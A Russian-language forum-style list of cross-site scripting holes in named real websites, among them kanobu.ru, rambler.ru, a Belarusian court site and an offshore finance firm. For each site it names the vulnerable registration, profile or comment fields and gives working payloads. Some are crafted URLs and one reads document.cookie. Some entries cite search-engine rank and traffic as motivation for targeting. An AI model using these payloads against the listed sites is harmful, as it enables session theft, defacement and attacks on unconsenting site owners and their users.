Kanobu.ru xss И так все наверно слышали это сайт ( kanobu.ru ) и xss скорее всего старая...но и была пассивка но ее прикрыли) и так уязвимые поля: Skype Twitter "><script>alert('XSS')</script> также можно выполнять html код пример:"><center><h1>ДА ДА ДА</h1></center>
популярный сервис Спрашивай xss в поле имя при регистрации Code: "><script>alert(/xss/)</script> <script>alert('xss')</script> "><img src=aaa onerror=alert(document.cookie);>
интернет-магазин: gamepost.ua тИЦ: 10 PR: 3 Ни одно поле при регистрации не фильтруется. Уязвимо поле: Телефон
XSS rambler.ru: Логинимся на рамблере, http://foto.rambler.ru/photos/add/?album_id= загружаем фото Редактируем описание фото (действия с фото->редактировать) на: 1'</script><script>alert("Chymenik - this is XSS! +1rep")</script> Пример: http://foto.rambler.ru/photos/5051d95d-5cdd-e5af-2988-b7f96b35aa7c/
mingorsud. gov.by Code: h_tp://mingorsud.gov.by/syst em/tmp ls/pages/pismo/fi z.p hp Уязвимое поле: post_address вставляем : " onmouseover=prompt(943147) bad=" P.S. /system/tmpls/pages/pismo/ur.php Уязвимое поле: post_address
http://xakep.ru/articles/map/default.asp Вставляем код в любом поле и нажимаем на Отправить и вы суперхакер.
http://russen.eu Пример Сама уязвиость Уязвимое поле "О себе " Сайт находиться на 2 месте в топ mail "Знакомства"
https://www.abacuscapital.ky Code: https://www.abacuscapital.ky/contact.asp?Email=CodeFail&EmailAddress=%27%20onmouseover%3dprompt%28958726%29%20bad%3d%27&MessageBody=1%3C%2ftextarea%3E1%3CScRiPt%20%3Eprompt%28978443%29%3C%2fScRiPt%3E а точнее, уязвимы поля EmailAddress и MessageBody Тож самое в: /process_form.asp уязвимы поля EmailAddress и MessageBody
сайт клубной музыки bananastreet.ru ни одно поле не фильтруется в профиле код Code: <img src=f onerror=alert('XSSNAME') /> пример
Code: http://www.promontorio.net/index.php?id=23&page=project&pageNum_rs_list=1&sub=%22onmouseover=prompt(997378)%20bad='%3E%3Cs%D1%81ri%D1%80t%3Ealert(/xss/)%3C/s%D1%81ri%D1%80t%3E%22
Сайт _ttp://allforchildren.ru Уязвимое поле комментарии. Пример Сайт хороший, было бы жаль если админы не примут меры.
ogl.ru/project/users/login.php Уязвимое поле - Email ========================== twoystyle.ru Регаемся, вставляя во все поля наш скрипт, далее авторизовываемся на twoystyle.ru/login.asp, введя соответствующие данные и наблюдаем картину маслом ========================== mosgorfoto.com/users/auth.php Уязвимое поле - Эл.почта
http://chelreal.ru/ Яндекс Тиц 1400 Яндекс Каталог Да уязвимость в модуле комментарий Code: <script>alert('xss')</script>
http://101@ru Яндекс тИЦ 1700 Яндекс Каталог Да Уязвимое поле login (очень удобно) Чуток мотиваций Трафик